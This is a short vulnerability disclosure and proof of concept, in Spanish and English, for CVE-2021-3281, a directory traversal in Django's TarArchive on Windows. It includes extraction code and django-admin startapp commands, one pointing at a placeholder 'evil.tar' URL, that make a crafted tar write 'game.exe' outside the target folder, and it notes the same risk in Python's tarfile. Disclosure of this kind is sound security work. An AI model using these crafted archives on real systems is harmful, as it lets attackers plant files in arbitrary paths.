
Prueba de concepto para CVE-2021-3281: vulnerabilidad de recorrido de directorio en la utilidad TarArchive de Django mediante archivos tar manipulados, con demostración del módulo tarfile de Python.
Existe una vulnerabilidad de Directory Traversal en django.utils.archive.py, línea:171, en la clase TarArchive.
La llamada a la función os.path.join(to_path, name) no verificaba el parámetro "name"; si alguien usa esta utilidad en la plataforma Windows, habrá un riesgo de Directory Traversal. El POC es:
from django.utils import archive
archive.extract('test.tar','.')
The test.tar include file named "d:game.exe",and the poc will create a file named "game.exe" in D://game.exe rather than "."
It looks like the Django core didn't use this util,but I still think it's a risk,maybe someone will use this util in webapp to archive somethings.``and there is another scene:``"djangoadmin startapp --template" command will use archive.py,see in https://docs.djangoproject.com/en/3.1/ref/django-admin/#s-startapp. POC is:
django-admin.exe startapp vulapp --template="C:/my_templates/test.tar"
It'll create a file named "game.exe" in D://game.exe rather than "vulapp/", It also accept URLs like "django-admin.exe startapp vulapp --template=https://xxx.com/evil.tar"
from django.utils import archive
archive.extract('test.tar','.')
El mismo problema existe en Python/Lib/tarfile.py:
#Lib/tarfile.py:
import tarfile
tar=tarfile.open('test.tar','r')
tar.extractall('.')
tar.close()
y la documentación da una advertencia; ver https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall